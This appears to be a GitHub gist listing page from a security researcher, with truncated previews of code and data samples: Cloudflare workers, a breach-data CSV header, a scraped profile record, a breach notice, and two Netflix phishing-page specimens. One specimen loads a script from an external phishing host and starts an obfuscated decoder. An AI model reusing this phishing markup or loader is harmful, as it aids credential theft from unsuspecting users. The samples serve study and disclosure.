View UsersData.csv
Id MapID UserID AddressId Fax Lat Lon Sex Tel Tel2 Email Notes State Title Banned LastIP Status URLName AddrCity AgeRange LastName NickName Services FirstName InitialIP LastLogin RFDIssuer RFDNumber TelMobile TermsText TermsWhen AddrCounty Categories EmailOptIn Facilities ImageCount ModifyTime TradeTypes TraderType WebAddress AddrCountry AddrStreet1 AddrStreet2 AddrStreet3 BillStreet1 ConfirmHash Description LastBrowser ShowAddress TermsAgreed AddrPostcode BillPostCode CreationTime HideStockNos InvoiceEmail Organization PasswordHash DefaultAdText PasswordScore EmailValidated MarketingOptIn SpecialBilling DistancePostcode MarketingOptTime EmailValidationString
@troyhunt
troyhunt / rick-roll-content-scraper.js
Created Aug 19, 2020
A Cloudflare worker to redirect image requests from dickhead content scraper's site to a Rick Roll
View rick-roll-content-scraper.js
addEventListener('fetch', event => {
  event.respondWith(fetchAndApply(event.request))
})

async function fetchAndApply(request) {
  let response = await fetch(request)
  let referer = request.headers.get('Referer')
  let contentType = response.headers.get('Content-Type') || ''
  if (referer && contentType.startsWith('image/')) {
View troys-been-scraped.json
{
  "_id": {
    "$oid": "5b9f0ec2385f0a00655c92fb"
  },
  "email": "troyhunt@hotmail.com",
  "emails": [
    {
      "local": "troyhunt",
      "domain": "hotmail.com",
      "type": "personal",
@troyhunt
troyhunt / uniform-urls.js
Created Sep 4, 2018
Cloudflare Worker to normalise URLs for cache efficiency
View uniform-urls.js
addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request));
})

/**
 * Fetch request after making casing of hash prefix uniform
 * @param {Request} request
 */
async function handleRequest(request) {
@troyhunt
troyhunt / roblox.html
Created Jul 30, 2018
Roblox response to an insecure request
View roblox.html
HTTP/1.1 200 OK
Server: nginx/1.13.12
Date: Mon, 30 Jul 2018 00:34:29 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-DIS-Request-ID: 92ff365aa7add940416ef2364da35e97
P3P: CP="NON DSP COR ADMa OUR IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Length: 1557
View expanded-phishing-file.html
<title>Netflix</title>
<meta content="" name="keywords">
<meta content="" name="description">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<link type="text/css" rel="stylesheet" href="css/z.css">
<link type="text/css" rel="stylesheet" href="css/a.css">
<link rel="shortcut icon" href="img/nficon2015.ico">
View encrypted-phishing-file.html
<html><head><script src="http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/hok.js"></script><script>
var hea2p =
('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz');
var hea2t =
@troyhunt
troyhunt / mountain-training-breach-notice
Created Nov 23, 2016
A very well written breach notice from Mountain Training
View mountain-training-breach-notice
Dear [redacted],
This email is being sent to you about a recent security breach to Mountain Training's website and has been sent using Mail Chimp instead of our candidate management system. The reason for this is explained below.
Our candidate management system, powered by TahDah, recently suffered a security breach and I want to reassure you straightaway that no passwords, bank or card details have been accessed, or ever can be. On the evening of Saturday 12th November, someone gained unauthorised access to the website of our candidate management system via the admin account of a TahDah staff member. The database, which sits behind the website, was not accessed. The unauthorised person(s) replaced the log in page so that no one could gain access to the website and sent an email to ‘All candidates’ which contained a malicious link.
The staff of Mountain Training and our database developer TahDah responded very quickly and were able to intercept the email, so that it was sent to a relatively small percentag